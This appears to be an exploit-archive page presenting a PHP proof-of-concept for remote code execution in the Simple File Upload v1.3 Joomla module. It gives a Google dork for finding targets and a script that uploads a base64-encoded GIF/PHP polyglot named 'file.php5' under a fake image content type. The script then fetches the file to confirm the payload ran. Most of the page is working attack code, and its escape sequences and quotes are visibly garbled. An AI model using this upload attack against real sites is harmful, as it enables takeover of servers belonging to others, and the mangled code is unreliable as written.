Simple File Upload v1.3 Joomla Module Remote Code Execution

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Simple File Upload v1.3 Joomla Module Remote Code Execution
# Published : 2011-12-28
# Author :
# Previous Title : Plone and Zope Remote Command Execution PoC
# Next Title : SpamTitan v5.08 Multiple Vulnerabilities

<?PHP

/*
    --------------------------------------------------------------------------------
    Title: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit
    --------------------------------------------------------------------------------
     
    Author...............: gmda
	Google Dork..........:"Simple File Upload v1.3" "Powered by Joomla"
    Mail.................: gmda[at]email[dot]it
	Site.................: http://www.gmda.altervista.org/
	Date.................: 26/12/2011
	Software Link: http://wasen.net/downloads/mod_simpleFileUpload.1.3.zip
    Version: 1.3
    Tested on: winxp php version 5.3.2 	Apache 2.0
	
	*the setup of the module is no captcha other setups are the default*
     
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
	
	
	
	The vulnerability is closed to transmit malformed packets to the server that he still plays and saves in his belly.
    This thing can be a bad intent to send commands to the server running clearly causing safety problems ........
    The script has peroblemi upload quality control .....
  
  
*/


$host="127.0.0.1";
$port=80;
$shell="R0lGOC8qLyo8P3BocCBwYXNzdGhydSgnY2FsYycpPz4vKg==";
$ContentType="image/gif";
$post="POST http://$host/Joomla_1.5.23_ita-Stable_test_expl/index.php";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$filename="file.php5";








if(!$fp) die($errstr.$errno); else {





                $data="-----------------------------41184676334rn";
                $data.="Content-Disposition: form-data; name="MAX_FILE_SIZE"rn";
                $data.="rn";
                $data.="100000rn-----------------------------41184676334rn";
                $data.="Content-Disposition: form-data;name="sfuFormFields44"rn";
                $data.="rnrn";
                $data.="-----------------------------41184676334rn";
                $data.="Content-Disposition:form-data; name="uploadedfile44[]"; filename="file.php5"rnContent-Type: image/gifrnrn";
                $data.=base64_decode($shell)."rn";
                $data.="-----------------------------41184676334--rn";


				

                $packet="$post HTTP/1.1rn";
                $packet.="Host: ".$host.":".$port."rn";
                $packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334rn";
                $packet.="Content-Length: ".strlen($data)."rn";
                $packet.="Connection: Closernrn";
                $packet.=$data;



				
fwrite($fp, $packet);
    fclose($fp);
	
	

	
}

 	     

				 
		 
    $h = @fopen("http://".$host."/Joomla_1.5.23_ita-Stable_test_expl/images/file.php5", "r");
      if ($h) {
            while (($buf = fgets($h, 4096)) !== false) {
		     echo $buf;
		     echo("exploit was successful");
   }
   
    fclose($h);
	}else{
     echo("Error: exploit fail");
   }
?>